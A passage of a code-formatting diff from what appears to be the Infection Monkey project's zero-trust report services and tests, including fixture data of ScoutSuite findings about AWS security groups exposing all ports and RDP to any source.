"route53", + "s3", + "ses", + "sns", + "sqs", + "vpc", + "secretsmanager", + ], + "service_groups": {"...": {"...": "..."}}, } diff --git a/monkey/monkey_island/cc/services/zero_trust/test_common/scoutsuite_finding_data.py b/monkey/monkey_island/cc/services/zero_trust/test_common/scoutsuite_finding_data.py index fb9722ca2..4e428794d 100644 --- a/monkey/monkey_island/cc/services/zero_trust/test_common/scoutsuite_finding_data.py +++ b/monkey/monkey_island/cc/services/zero_trust/test_common/scoutsuite_finding_data.py @@ -1,70 +1,72 @@ from monkey_island.cc.models.zero_trust.scoutsuite_finding_details import ScoutSuiteFindingDetails from monkey_island.cc.models.zero_trust.scoutsuite_rule import ScoutSuiteRule -from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_finding_maps import PermissiveFirewallRules, \ - UnencryptedData - -SCOUTSUITE_FINDINGS = [ +from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_finding_maps import ( PermissiveFirewallRules, - UnencryptedData -] + UnencryptedData, +) + +SCOUTSUITE_FINDINGS = [PermissiveFirewallRules, UnencryptedData] RULES = [ ScoutSuiteRule( checked_items=179, compliance=None, - dashboard_name='Rules', - description='Security Group Opens All Ports to All', + dashboard_name="Rules", + description="Security Group Opens All Ports to All", flagged_items=2, items=[ - 'ec2.regions.eu-central-1.vpcs.vpc-0ee259b1a13c50229.security_groups.sg-035779fe5c293fc72' - '.rules.ingress.protocols.ALL.ports.1-65535.cidrs.2.CIDR', - 'ec2.regions.eu-central-1.vpcs.vpc-00015526b6695f9aa.security_groups.sg-019eb67135ec81e65' - '.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR' + "ec2.regions.eu-central-1.vpcs.vpc-0ee259b1a13c50229.security_groups.sg-035779fe5c293fc72" + ".rules.ingress.protocols.ALL.ports.1-65535.cidrs.2.CIDR", + "ec2.regions.eu-central-1.vpcs.vpc-00015526b6695f9aa.security_groups.sg-019eb67135ec81e65" + ".rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR", ], - level='danger', - path='ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR', - rationale='It was detected that all ports in the security group are open, and any source IP address' - ' could send traffic to these ports, which creates a wider attack surface for resources ' - 'assigned to it. Open ports should be reduced to the minimum needed to correctly', + level="danger", + path="ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR", + rationale="It was detected that all ports in the security group are open, and any source IP address" + " could send traffic to these ports, which creates a wider attack surface for resources " + "assigned to it. Open ports should be reduced to the minimum needed to correctly", references=[], remediation=None, - service='EC2' + service="EC2", ), ScoutSuiteRule( checked_items=179, - compliance=[{'name': 'CIS Amazon Web Services Foundations', 'version': '1.0.0', 'reference': '4.1'}, - {'name': 'CIS Amazon Web Services Foundations', 'version': '1.0.0', 'reference': '4.2'}, - {'name': 'CIS Amazon Web Services Foundations', 'version': '1.1.0', 'reference': '4.1'}, - {'name': 'CIS Amazon Web Services Foundations', 'version': '1.1.0', 'reference': '4.2'}, - {'name': 'CIS Amazon Web Services Foundations', 'version': '1.2.0', 'reference': '4.1'}, - {'name': 'CIS Amazon Web Services Foundations', 'version': '1.2.0', 'reference': '4.2'}], - dashboard_name='Rules', - description='Security Group Opens RDP Port to All', + compliance=[ + {"name": "CIS Amazon Web Services Foundations", "version": "1.0.0", "reference": "4.1"}, + {"name": "CIS Amazon Web Services Foundations", "version": "1.0.0", "reference": "4.2"}, + {"name": "CIS Amazon Web Services Foundations", "version": "1.1.0", "reference": "4.1"}, + {"name": "CIS Amazon Web Services Foundations", "version": "1.1.0", "reference": "4.2"}, + {"name": "CIS Amazon Web Services Foundations", "version": "1.2.0", "reference": "4.1"}, + {"name": "CIS Amazon Web Services Foundations", "version": "1.2.0", "reference": "4.2"}, + ], + dashboard_name="Rules", + description="Security Group Opens RDP Port to All", flagged_items=7, items=[ - 'ec2.regions.eu-central-1.vpcs.vpc-076500a2138ee09da.security_groups.sg-00bdef5951797199c' - '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR', - 'ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-007931ba8a364e330' - '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR', - 'ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-05014daf996b042dd' - '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR', - 'ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-0c745fe56c66335b2' - '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR', - 'ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-0f99b85cfad63d1b1' - '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR', - 'ec2.regions.us-east-1.vpcs.vpc-9e56cae4.security_groups.sg-0dc253aa79062835a' - '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR', - 'ec2.regions.us-east-1.vpcs.vpc-002d543353cd4e97d.security_groups.sg-01902f153d4f938da' - '.rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR'], - level='danger', - path='ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR', - rationale='The security group was found to be exposing a well-known port to all source addresses.' - ' Well-known ports are commonly probed by automated scanning tools, and could be an indicator ' - 'of sensitive services exposed to Internet. If such services need to be expos', + "ec2.regions.eu-central-1.vpcs.vpc-076500a2138ee09da.security_groups.sg-00bdef5951797199c" + ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR", + "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-007931ba8a364e330" + ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR", + "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-05014daf996b042dd" + ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR", + "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-0c745fe56c66335b2" + ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR", + "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-0f99b85cfad63d1b1" + ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR", + "ec2.regions.us-east-1.vpcs.vpc-9e56cae4.security_groups.sg-0dc253aa79062835a" + ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR", + "ec2.regions.us-east-1.vpcs.vpc-002d543353cd4e97d.security_groups.sg-01902f153d4f938da" + ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR", + ], + level="danger", + path="ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR", + rationale="The security group was found to be exposing a well-known port to all source addresses." + " Well-known ports are commonly probed by automated scanning tools, and could be an indicator " + "of sensitive services exposed to Internet. If such services need to be expos", references=[], - remediation='Remove the inbound rules that expose open ports', - service='EC2' - ) + remediation="Remove the inbound rules that expose open ports", + service="EC2", + ), ] diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/finding_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/finding_service.py index 5b69d6ad9..cf65819df 100644 --- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/finding_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/finding_service.py @@ -8,7 +8,9 @@ from common.utils.exceptions import UnknownFindingError from monkey_island.cc.models.zero_trust.finding import Finding from monkey_island.cc.models.zero_trust.monkey_finding import MonkeyFinding from monkey_island.cc.models.zero_trust.scoutsuite_finding import ScoutSuiteFinding -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_details_service import MonkeyZTDetailsService +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_details_service import ( + MonkeyZTDetailsService, +) @dataclass @@ -22,7 +24,6 @@ class EnrichedFinding: class FindingService: - @staticmethod def get_all_findings_from_db() -> List[Finding]: return list(Finding.objects) @@ -39,14 +40,14 @@ class FindingService: @staticmethod def _get_enriched_finding(finding: Finding) -> EnrichedFinding: - test_info = zero_trust_consts.TESTS_MAP[finding['test']] + test_info = zero_trust_consts.TESTS_MAP[finding["test"]] enriched_finding = EnrichedFinding( - finding_id=str(finding['_id']), - test=test_info[zero_trust_consts.FINDING_EXPLANATION_BY_STATUS_KEY][finding['status']], - test_key=finding['test'], + finding_id=str(finding["_id"]), + test=test_info[zero_trust_consts.FINDING_EXPLANATION_BY_STATUS_KEY][finding["status"]], + test_key=finding["test"], pillars=test_info[zero_trust_consts.PILLARS_KEY], - status=finding['status'], - details=None + status=finding["status"], + details=None, ) return enriched_finding diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/pillar_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/pillar_service.py index 4f9c067f6..fda738c45 100644 --- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/pillar_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/pillar_service.py @@ -3,12 +3,13 @@ from monkey_island.cc.services.zero_trust.zero_trust_report.finding_service impo class PillarService: - @staticmethod def get_pillar_report_data(): - return {"statusesToPillars": PillarService._get_statuses_to_pillars(), - "pillarsToStatuses": PillarService._get_pillars_to_statuses(), - "grades": PillarService._get_pillars_grades()} + return { + "statusesToPillars": PillarService._get_statuses_to_pillars(), + "pillarsToStatuses": PillarService._get_pillars_to_statuses(), + "grades": PillarService._get_pillars_grades(), + } @staticmethod def _get_pillars_grades(): @@ -25,7 +26,7 @@ class PillarService: zero_trust_consts.STATUS_FAILED: 0, zero_trust_consts.STATUS_VERIFY: 0, zero_trust_consts.STATUS_PASSED: 0, - zero_trust_consts.STATUS_UNEXECUTED: 0 + zero_trust_consts.STATUS_UNEXECUTED: 0, } tests_of_this_pillar = zero_trust_consts.PILLARS_TO_TESTS[pillar] @@ -40,7 +41,9 @@ class PillarService: if pillar in test_info[zero_trust_consts.PILLARS_KEY]: pillar_grade[finding.status] += 1 - pillar_grade[zero_trust_consts.STATUS_UNEXECUTED] = list(test_unexecuted.values()).count(True) + pillar_grade[zero_trust_consts.STATUS_UNEXECUTED] = list(test_unexecuted.values()).count( + True + ) return pillar_grade @@ -50,7 +53,7 @@ class PillarService: zero_trust_consts.STATUS_FAILED: [], zero_trust_consts.STATUS_VERIFY: [], zero_trust_consts.STATUS_PASSED: [], - zero_trust_consts.STATUS_UNEXECUTED: [] + zero_trust_consts.STATUS_UNEXECUTED: [], } for pillar in zero_trust_consts.PILLARS: results[PillarService.__get_status_of_single_pillar(pillar)].append(pillar) diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/principle_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/principle_service.py index 006cb053e..671d1da44 100644 --- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/principle_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/principle_service.py @@ -3,7 +3,6 @@ from monkey_island.cc.models.zero_trust.finding import Finding class PrincipleService: - @staticmethod def get_principles_status(): all_principles_statuses = {} @@ -18,7 +17,7 @@ class PrincipleService: { "principle": zero_trust_consts.PRINCIPLES[principle], "tests": PrincipleService.__get_tests_status(principle_tests), - "status": PrincipleService.__get_principle_status(principle_tests) + "status": PrincipleService.__get_principle_status(principle_tests), } ) @@ -29,11 +28,12 @@ class PrincipleService: worst_status = zero_trust_consts.STATUS_UNEXECUTED all_statuses = set() for test in principle_tests: - all_statuses |= set(Finding.objects(test=test).distinct('status')) + all_statuses |= set(Finding.objects(test=test).distinct("status")) for status in all_statuses: - if zero_trust_consts.ORDERED_TEST_STATUSES.index(status) \ - < zero_trust_consts.ORDERED_TEST_STATUSES.index(worst_status): + if zero_trust_consts.ORDERED_TEST_STATUSES.index( + status + ) < zero_trust_consts.ORDERED_TEST_STATUSES.index(worst_status): worst_status = status return worst_status @@ -45,8 +45,10 @@ class PrincipleService: test_findings = Finding.objects(test=test) results.append( { - "test": zero_trust_consts.TESTS_MAP[test][zero_trust_consts.TEST_EXPLANATION_KEY], - "status": PrincipleService.__get_lcd_worst_status_for_test(test_findings) + "test": zero_trust_consts.TESTS_MAP[test][ + zero_trust_consts.TEST_EXPLANATION_KEY + ], + "status": PrincipleService.__get_lcd_worst_status_for_test(test_findings), } ) return results @@ -60,8 +62,9 @@ class PrincipleService: """ current_worst_status = zero_trust_consts.STATUS_UNEXECUTED for finding in all_findings_for_test: - if zero_trust_consts.ORDERED_TEST_STATUSES.index(finding.status) \ - < zero_trust_consts.ORDERED_TEST_STATUSES.index(current_worst_status): + if zero_trust_consts.ORDERED_TEST_STATUSES.index( + finding.status + ) < zero_trust_consts.ORDERED_TEST_STATUSES.index(current_worst_status): current_worst_status = finding.status return current_worst_status diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_common/example_finding_data.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_common/example_finding_data.py index 917678ed8..51677efc9 100644 --- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_common/example_finding_data.py +++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_common/example_finding_data.py @@ -1,54 +1,79 @@ from common.common_consts import zero_trust_consts -from monkey_island.cc.services.zero_trust.test_common.finding_data import get_monkey_finding_dto, \ - get_scoutsuite_finding_dto +from monkey_island.cc.services.zero_trust.test_common.finding_data import ( + get_monkey_finding_dto, + get_scoutsuite_finding_dto, +) def save_example_findings(): # devices passed = 1 - _save_finding_with_status('scoutsuite', zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, - zero_trust_consts.STATUS_PASSED) + _save_finding_with_status( + "scoutsuite", + zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, + zero_trust_consts.STATUS_PASSED, + ) # devices passed = 2 - _save_finding_with_status('scoutsuite', zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, - zero_trust_consts.STATUS_PASSED) + _save_finding_with_status( + "scoutsuite", + zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, + zero_trust_consts.STATUS_PASSED, + ) # devices failed = 1 - _save_finding_with_status('monkey', zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, - zero_trust_consts.STATUS_FAILED) + _save_finding_with_status( + "monkey", zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, zero_trust_consts.STATUS_FAILED + ) # people verify = 1 # networks verify = 1 - _save_finding_with_status('scoutsuite', zero_trust_consts.TEST_SCHEDULED_EXECUTION, - zero_trust_consts.STATUS_VERIFY) + _save_finding_with_status( + "scoutsuite", zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY + ) # people verify = 2 # networks verify = 2 - _save_finding_with_status('monkey', zero_trust_consts.TEST_SCHEDULED_EXECUTION, - zero_trust_consts.STATUS_VERIFY) + _save_finding_with_status( + "monkey", zero_trust_consts.TEST_SCHEDULED_EXECUTION, zero_trust_consts.STATUS_VERIFY + ) # data failed 1 - _save_finding_with_status('monkey', zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, - zero_trust_consts.STATUS_FAILED) + _save_finding_with_status( + "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED + ) # data failed 2 - _save_finding_with_status('scoutsuite', zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA, - zero_trust_consts.STATUS_FAILED) + _save_finding_with_status( + "scoutsuite", + zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA, + zero_trust_consts.STATUS_FAILED, + ) # data failed 3 - _save_finding_with_status('monkey', zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, - zero_trust_consts.STATUS_FAILED) + _save_finding_with_status( + "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED + ) # data failed 4 - _save_finding_with_status('monkey', zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, - zero_trust_consts.STATUS_FAILED) + _save_finding_with_status( + "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_FAILED + ) # data failed 5 - _save_finding_with_status('scoutsuite', zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA, - zero_trust_consts.STATUS_FAILED) + _save_finding_with_status( + "scoutsuite", + zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA, + zero_trust_consts.STATUS_FAILED, + ) # data verify 1 - _save_finding_with_status('monkey', zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, - zero_trust_consts.STATUS_VERIFY) + _save_finding_with_status( + "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY + ) # data verify 2 - _save_finding_with_status('monkey', zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, - zero_trust_consts.STATUS_VERIFY) + _save_finding_with_status( + "monkey", zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, zero_trust_consts.STATUS_VERIFY + ) # data passed 1 - _save_finding_with_status('scoutsuite', zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA, - zero_trust_consts.STATUS_PASSED) + _save_finding_with_status( + "scoutsuite", + zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA, + zero_trust_consts.STATUS_PASSED, + ) def _save_finding_with_status(finding_type: str, test: str, status: str): - if finding_type == 'scoutsuite': + if finding_type == "scoutsuite": finding = get_scoutsuite_finding_dto() else: finding = get_monkey_finding_dto() diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_finding_service.py index 9d832e106..67bdbc308 100644 --- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_finding_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_finding_service.py @@ -2,12 +2,26 @@ from unittest.mock import MagicMock import pytest -from common.common_consts.zero_trust_consts import TESTS_MAP, TEST_SCOUTSUITE_SERVICE_SECURITY, STATUS_FAILED, \ - DEVICES, NETWORKS, STATUS_PASSED, TEST_ENDPOINT_SECURITY_EXISTS -from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_details_service import MonkeyZTDetailsService -from monkey_island.cc.services.zero_trust.test_common.finding_data import get_scoutsuite_finding_dto, \ - get_monkey_finding_dto -from monkey_island.cc.services.zero_trust.zero_trust_report.finding_service import FindingService, EnrichedFinding +from common.common_consts.zero_trust_consts import ( + TESTS_MAP, + TEST_SCOUTSUITE_SERVICE_SECURITY, + STATUS_FAILED, + DEVICES, + NETWORKS, + STATUS_PASSED, + TEST_ENDPOINT_SECURITY_EXISTS, +) +from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_details_service import ( + MonkeyZTDetailsService, +) +from monkey_island.cc.services.zero_trust.test_common.finding_data import ( + get_scoutsuite_finding_dto, + get_monkey_finding_dto, +) +from monkey_island.cc.services.zero_trust.zero_trust_report.finding_service import ( + FindingService, + EnrichedFinding, +) from monkey_island.cc.test_common.fixtures.fixture_enum import FixtureEnum @@ -21,21 +35,25 @@ def test_get_all_findings(): findings = FindingService.get_all_findings_for_ui() - description = TESTS_MAP[TEST_SCOUTSUITE_SERVICE_SECURITY]['finding_explanation'][STATUS_FAILED] - expected_finding0 = EnrichedFinding(finding_id=findings[0].finding_id, - pillars=[DEVICES, NETWORKS], - status=STATUS_FAILED, - test=description, - test_key=TEST_SCOUTSUITE_SERVICE_SECURITY, - details=None) + description = TESTS_MAP[TEST_SCOUTSUITE_SERVICE_SECURITY]["finding_explanation"][STATUS_FAILED] + expected_finding0 = EnrichedFinding( + finding_id=findings[0].finding_id, + pillars=[DEVICES, NETWORKS], + status=STATUS_FAILED, + test=description, + test_key=TEST_SCOUTSUITE_SERVICE_SECURITY, + details=None, + ) - description = TESTS_MAP[TEST_ENDPOINT_SECURITY_EXISTS]['finding_explanation'][STATUS_PASSED] - expected_finding1 = EnrichedFinding(finding_id=findings[1].finding_id, - pillars=[DEVICES], - status=STATUS_PASSED, - test=description, - test_key=TEST_ENDPOINT_SECURITY_EXISTS, - details=None) + description = TESTS_MAP[TEST_ENDPOINT_SECURITY_EXISTS]["finding_explanation"][STATUS_PASSED] + expected_finding1 = EnrichedFinding( + finding_id=findings[1].finding_id, + pillars=[DEVICES], + status=STATUS_PASSED, + test=description, + test_key=TEST_ENDPOINT_SECURITY_EXISTS, + details=None, + ) # Don't test details details = [] diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_pillar_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_pillar_service.py index bf2bbe1a5..32dbaadc9 100644 --- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_pillar_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_pillar_service.py @@ -3,11 +3,19 @@ from typing import List import pytest from common.common_consts import zero_trust_consts -from common.common_consts.zero_trust_consts import DATA, PEOPLE, NETWORKS, WORKLOADS, VISIBILITY_ANALYTICS, \ - AUTOMATION_ORCHESTRATION, DEVICES +from common.common_consts.zero_trust_consts import ( + DATA, + PEOPLE, + NETWORKS, + WORKLOADS, + VISIBILITY_ANALYTICS, + AUTOMATION_ORCHESTRATION, + DEVICES, +) from monkey_island.cc.services.zero_trust.zero_trust_report.pillar_service import PillarService -from monkey_island.cc.services.zero_trust.zero_trust_report.test_common.example_finding_data import \ - save_example_findings +from monkey_island.cc.services.zero_trust.zero_trust_report.test_common.example_finding_data import ( + save_example_findings, +) from monkey_island.cc.test_common.fixtures import FixtureEnum @@ -27,7 +35,7 @@ def _get_expected_pillar_grades() -> List[dict]: zero_trust_consts.STATUS_PASSED: 1, # 2 different tests of DATA pillar were executed in _save_findings() zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(DATA) - 2, - "pillar": "Data" + "pillar": "Data", }, { zero_trust_consts.STATUS_FAILED: 0, @@ -35,7 +43,7 @@ def _get_expected_pillar_grades() -> List[dict]: zero_trust_consts.STATUS_PASSED: 0, # 1 test of PEOPLE pillar were executed in _save_findings() zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(PEOPLE) - 1, - "pillar": "People" + "pillar": "People", }, { zero_trust_consts.STATUS_FAILED: 0, @@ -43,7 +51,7 @@ def _get_expected_pillar_grades() -> List[dict]: zero_trust_consts.STATUS_PASSED: 0, # 1 different tests of NETWORKS pillar were executed in _save_findings() zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(NETWORKS) - 1, - "pillar": "Networks" + "pillar": "Networks", }, { zero_trust_consts.STATUS_FAILED: 1, @@ -51,7 +59,7 @@ def _get_expected_pillar_grades() -> List[dict]: zero_trust_consts.STATUS_PASSED: 2, # 1 different tests of DEVICES pillar were executed in _save_findings() zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(DEVICES) - 1, - "pillar": "Devices" + "pillar": "Devices", }, { zero_trust_consts.STATUS_FAILED: 0, @@ -59,7 +67,7 @@ def _get_expected_pillar_grades() -> List[dict]: zero_trust_consts.STATUS_PASSED: 0, # 0 different tests of WORKLOADS pillar were executed in _save_findings() zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(WORKLOADS), - "pillar": "Workloads" + "pillar": "Workloads", }, { zero_trust_consts.STATUS_FAILED: 0, @@ -67,21 +75,25 @@ def _get_expected_pillar_grades() -> List[dict]: zero_trust_consts.STATUS_PASSED: 0, # 0 different tests of VISIBILITY_ANALYTICS pillar were executed in _save_findings() zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(VISIBILITY_ANALYTICS), - "pillar": "Visibility & Analytics" + "pillar": "Visibility & Analytics", }, { zero_trust_consts.STATUS_FAILED: 0, zero_trust_consts.STATUS_VERIFY: 0, zero_trust_consts.STATUS_PASSED: 0, # 0 different tests of AUTOMATION_ORCHESTRATION pillar were executed in _save_findings() - zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar(AUTOMATION_ORCHESTRATION), - "pillar": "Automation & Orchestration" - } + zero_trust_consts.STATUS_UNEXECUTED: _get_cnt_of_tests_in_pillar( + AUTOMATION_ORCHESTRATION + ), + "pillar": "Automation & Orchestration", + }, ] def _get_cnt_of_tests_in_pillar(pillar: str): - tests_in_pillar = [value for (key, value) in zero_trust_consts.TESTS_MAP.items() if pillar in value['pillars']] + tests_in_pillar = [ + value for (key, value) in zero_trust_consts.TESTS_MAP.items() if pillar in value["pillars"] + ] return len(tests_in_pillar) @@ -95,7 +107,7 @@ def test_get_pillars_to_statuses(): zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_UNEXECUTED, zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED, zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED, - zero_trust_consts.DATA: zero_trust_consts.STATUS_UNEXECUTED + zero_trust_consts.DATA: zero_trust_consts.STATUS_UNEXECUTED, } assert PillarService._get_pillars_to_statuses() == expected @@ -108,6 +120,6 @@ def test_get_pillars_to_statuses(): zero_trust_consts.PEOPLE: zero_trust_consts.STATUS_VERIFY, zero_trust_consts.VISIBILITY_ANALYTICS: zero_trust_consts.STATUS_UNEXECUTED, zero_trust_consts.WORKLOADS: zero_trust_consts.STATUS_UNEXECUTED, - zero_trust_consts.DATA: zero_trust_consts.STATUS_FAILED + zero_trust_consts.DATA: zero_trust_consts.STATUS_FAILED, } assert PillarService._get_pillars_to_statuses() == expected diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_principle_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_principle_service.py index fd2502f59..23d3cd08e 100644 --- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_principle_service.py +++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/test_principle_service.py @@ -1,90 +1,86 @@ import pytest from common.common_consts import zero_trust_consts -from monkey_island.cc.services.zero_trust.test_common.finding_data import get_monkey_finding_dto, \ - get_scoutsuite_finding_dto -from monkey_island.cc.services.zero_trust.zero_trust_report.principle_service import PrincipleService +from monkey_island.cc.services.zero_trust.test_common.finding_data import ( + get_monkey_finding_dto, + get_scoutsuite_finding_dto, +) +from monkey_island.cc.services.zero_trust.zero_trust_report.principle_service import ( + PrincipleService, +) from monkey_island.cc.test_common.fixtures import FixtureEnum EXPECTED_DICT = { - 'test_pillar1': [ + "test_pillar1": [ { - "principle": 'Test principle description2', + "principle": "Test principle description2", "status": zero_trust_consts.STATUS_FAILED, "tests": [ - { - "status": zero_trust_consts.STATUS_PASSED, - "test": "You ran a test2" - }, - { - "status": zero_trust_consts.STATUS_FAILED, - "test": "You ran a test3" - } - ] + {"status": zero_trust_consts.STATUS_PASSED, "test": "You ran a test2"}, + {"status": zero_trust_consts.STATUS_FAILED, "test": "You ran a test3"}, + ], } ], - 'test_pillar2': [ + "test_pillar2": [ { "principle": "Test principle description", "status": zero_trust_consts.STATUS_PASSED, - "tests": [ - { - "status": zero_trust_consts.STATUS_PASSED, - "test": "You ran a test1" - } - ] + "tests": [{"status": zero_trust_consts.STATUS_PASSED, "test": "You ran a test1"}], }, { "principle": "Test principle description2", "status": zero_trust_consts.STATUS_FAILED, "tests": [ - { - "status": zero_trust_consts.STATUS_PASSED, - "test": "You ran a test2" - }, - { - "status": zero_trust_consts.STATUS_FAILED, - "test": "You ran a test3" - }, - ] - } - ] + {"status": zero_trust_consts.STATUS_PASSED, "test": "You ran a test2"}, + {"status": zero_trust_consts.STATUS_FAILED, "test": "You ran a test3"}, + ], + }, + ], } @pytest.mark.usefixtures(FixtureEnum.USES_DATABASE) def test_get_principles_status(): - TEST_PILLAR1 = 'test_pillar1' - TEST_PILLAR2 = 'test_pillar2' + TEST_PILLAR1 = "test_pillar1" + TEST_PILLAR2 = "test_pillar2" zero_trust_consts.PILLARS = (TEST_PILLAR1, TEST_PILLAR2) - principles_to_tests = {'network_policies': ['segmentation'], - 'endpoint_security': ['tunneling', 'scoutsuite_service_security']} + principles_to_tests = { + "network_policies": ["segmentation"], + "endpoint_security": ["tunneling", "scoutsuite_service_security"], + } zero_trust_consts.PRINCIPLES_TO_TESTS = principles_to_tests - principles_to_pillars = {'network_policies': {'test_pillar2'}, - 'endpoint_security': {'test_pillar1', 'test_pillar2'}} + principles_to_pillars = { + "network_policies": {"test_pillar2"}, + "endpoint_security": {"test_pillar1", "test_pillar2"}, + } zero_trust_consts.PRINCIPLES_TO_PILLARS = principles_to_pillars - principles = {'network_policies': 'Test principle description', 'endpoint_security': 'Test principle description2'} + principles = { + "network_policies": "Test principle description", + "endpoint_security": "Test principle description2", + } zero_trust_consts.PRINCIPLES = principles - tests_map = {'segmentation': {'explanation': 'You ran a test1'}, - 'tunneling': {'explanation': 'You ran a test2'}, - 'scoutsuite_service_security': {'explanation': 'You ran a test3'}} + tests_map = { + "segmentation": {"explanation": "You ran a test1"}, + "tunneling": {"explanation": "You ran a test2"}, + "scoutsuite_service_security": {"explanation": "You ran a test3"}, + } zero_trust_consts.TESTS_MAP = tests_map monkey_finding = get_monkey_finding_dto() - monkey_finding.test = 'segmentation' + monkey_finding.test = "segmentation" monkey_finding.save() monkey_finding = get_monkey_finding_dto() - monkey_finding.test = 'tunneling' + monkey_finding.test = "tunneling" monkey_finding.save() scoutsuite_finding = get_scoutsuite_finding_dto() - scoutsuite_finding.test = 'scoutsuite_service_security' + scoutsuite_finding.test = "scoutsuite_service_security" scoutsuite_finding.save() expected = 